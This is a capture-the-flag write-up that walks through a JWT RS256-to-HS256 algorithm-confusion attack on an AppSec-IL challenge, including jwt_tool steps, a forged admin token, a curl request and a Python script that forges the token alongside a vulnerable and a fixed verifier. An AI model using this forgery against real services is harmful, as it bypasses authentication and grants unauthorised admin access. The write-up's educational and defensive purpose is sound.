Tags: appsec-il jwt 

Rating:

URL :- https://mr-voorhees.appsecil.ctf.today/

###### Initial Recon:-
-----------------------------------------
###### *Directory Bruteforcing*

**[+]Found /robots.txt**

###### Robots.txt
---------------------------------
Found an endpoint '**/backup**' listed there,
*interesting*...

https://mr-voorhees.appsecil.ctf.today/backup/public.pem

Found a key file: a PEM-encoded public key. A public key is, by definition, not a secret, which matters later.

###### Enumerating Web Application:-
--------------------------------------------------

Intercepted the request and found an interesting cookie:

[ **token**=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VybmFtZSI6IlRhbWFyYSIsImlhdCI6MTYwMzgxNjU3Mn0.VPESAFhADhpCgj-WQI9FrcMShl5wUggjQU5DdfAk6YB1VRSPTQNtf6B7ilp0ieM3dms7ZCsN7qCPrh3U9Z1YDA ]

Yup, it's a **JWT**.

Now I know what to do with the key file.

But before that, let's gather some info on our JWT by base64url-decoding its header and payload:

*HEADER* : typ = "JWT", alg = "RS256" (RSA signature, so the server checks it with the public key we just found)
*CLAIMS* : username = "Tamara"
iat = 1603816572 #issued-at timestamp

### EXPLOITATION (TAMPERING JWT) :-
-----------------------------------------------------------------------

Fired up jwt_tool:

> `python jwt_tool eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VybmFtZSI6IlRhbWFyYSIsImlhdCI6MTYwMzgxNjU3Mn0.VPESAFhADhpCgj-WQI9FrcMShl5wUggjQU5DdfAk6YB1VRSPTQNtf6B7ilp0ieM3dms7ZCsN7qCPrh3U9Z1YDA`

Select Option **1: Tamper with JWT data (multiple signing options)**

Select Option **0**: no need to edit the header by hand, the signing step below takes care of the algorithm.

Select Option **1: Tamper the username value**

change Tamara => admin

Select Option **5: Token signing with key file**

*give it the path to the downloaded public.pem file.*

Select Keylength **1: HMAC-SHA256**

This is the classic RS256 => HS256 algorithm confusion. The server loads public.pem to check RSA signatures, but it also honours an `alg` of HS256 taken straight from the token header, and in that case it hands the same key bytes to HMAC-SHA256 as the secret. Since the public key is public, anyone can compute that HMAC. jwt_tool does exactly that: it rewrites `alg` to HS256 (visible in the forged header below) and signs with the contents of the file.

Generated the forged token:

Your new forged token:

[+] URL safe: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjAzODE2NTcyfQ.VtsLFQwmu0-XNH53bZql_ffKhT_bcytunhV_0zz5xu0

[+] Standard: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjAzODE2NTcyfQ.VtsLFQwmu0+XNH53bZql/ffKhT/bcytunhV/0zz5xu0

Use the URL-safe token as the cookie value and send a GET request to '/' for the flag.

`curl https://mr-voorhees.appsecil.ctf.today/ --cookie token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjAzODE2NTcyfQ.VtsLFQwmu0-XNH53bZql_ffKhT_bcytunhV_0zz5xu0`

![final](https://i.ibb.co/1nvLSyw/image.png)

***FLAG = AppSec-IL{100k_wh47_y0u_d1d_70_h1m}***
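To show what jwt_tool did under the hood, and what the fix looks like on the server side, here is an added example (my code, not the challenge's source and not jwt_tool's). It decodes the real token from this write-up, re-signs it with HS256 using the public key bytes as the HMAC secret, and runs it through two hypothetical verifiers: one that trusts `alg` from the header (the bug) and one that pins the algorithm in server configuration. `PUBLIC_PEM` is a constructed stand-in, since the real public.pem is not reproduced on the page; the attack only needs the exact bytes the server loads, whatever they are.

```python
import base64
import hashlib
import hmac
import json

# Token copied from the write-up: header says RS256, claims are Tamara's.
ORIGINAL_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9."
    "eyJ1c2VybmFtZSI6IlRhbWFyYSIsImlhdCI6MTYwMzgxNjU3Mn0."
    "VPESAFhADhpCgj-WQI9FrcMShl5wUggjQU5DdfAk6YB1VRSPTQNtf6B7ilp0ieM3dms7ZCsN7qCPrh3U9Z1YDA"
)

# Constructed stand-in for /backup/public.pem (not the real file). Any bytes work
# as long as they are exactly what the server loads as its verification key.
PUBLIC_PEM = (
    b"-----BEGIN PUBLIC KEY-----\n"
    b"EXAMPLEONLYnotArealKeyJustTheBytesTheServerLoadsAsItsRsaPublicKey==\n"
    b"-----END PUBLIC KEY-----\n"
)


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def compact_json(obj) -> bytes:
    # Same byte layout as the tokens on the page: no spaces, key order preserved.
    return json.dumps(obj, separators=(",", ":")).encode("utf-8")


def decode_unverified(token: str):
    """Split a JWT into (header, claims, signature bytes) without checking anything."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s)


def forge_hs256(token: str, server_key_material: bytes, **new_claims) -> str:
    """Rewrite alg to HS256 and sign with the server's public key bytes as the HMAC secret."""
    header, claims, _ = decode_unverified(token)
    header["alg"] = "HS256"
    claims.update(new_claims)
    signing_input = b64url_encode(compact_json(header)) + "." + b64url_encode(compact_json(claims))
    sig = hmac.new(server_key_material, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_trusting_header(token: str, key_material: bytes) -> dict:
    """Hypothetical vulnerable verifier: the attacker-controlled header picks the algorithm.

    One key blob is loaded for RSA; when the header says HS256 that same blob is
    used as the HMAC secret, and it is public.
    """
    header, claims, sig = decode_unverified(token)
    h, p, _ = token.split(".")
    alg = header.get("alg")
    if alg == "HS256":
        expected = hmac.new(key_material, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, sig):
            raise ValueError("bad HMAC signature")
        return claims
    if alg == "RS256":
        # A real server does RSASSA-PKCS1-v1_5/SHA-256 here (needs an RSA library).
        # The forged token never reaches this branch, which is the whole point.
        raise NotImplementedError("RS256 verification not implemented in this example")
    raise ValueError(f"unsupported alg {alg!r}")


def verify_pinned_alg(token: str, key_material: bytes, expected_alg: str = "RS256") -> dict:
    """Hypothetical fixed verifier: the algorithm is server config, never read from the token."""
    header, _, _ = decode_unverified(token)
    if header.get("alg") != expected_alg:
        raise ValueError(f"alg {header.get('alg')!r} rejected; only {expected_alg} is accepted")
    return verify_trusting_header(token, key_material)  # only the pinned RS256 branch remains


def pinned_alg_rejects(token: str, key_material: bytes) -> bool:
    """True if the pinned verifier refuses the token before any signature check."""
    try:
        verify_pinned_alg(token, key_material)
    except ValueError:
        return True
    except NotImplementedError:
        return False  # alg passed the pin; would go on to RSA verification
    return False


if __name__ == "__main__":
    forged = forge_hs256(ORIGINAL_TOKEN, PUBLIC_PEM, username="admin")
    print("forged:", forged)
    print("header-trusting verifier accepts:", verify_trusting_header(forged, PUBLIC_PEM))
    print("alg-pinned verifier rejects:", pinned_alg_rejects(forged, PUBLIC_PEM))
```

Because the encoding is byte-for-byte the same as jwt_tool's, the forged header and payload come out identical to the ones in the write-up; only the signature differs, since it depends on the real public.pem bytes. The fix is not "use a stronger key": it is refusing to let the token choose its own verification algorithm, and keeping HMAC secrets and RSA public keys in separate, non-interchangeable slots.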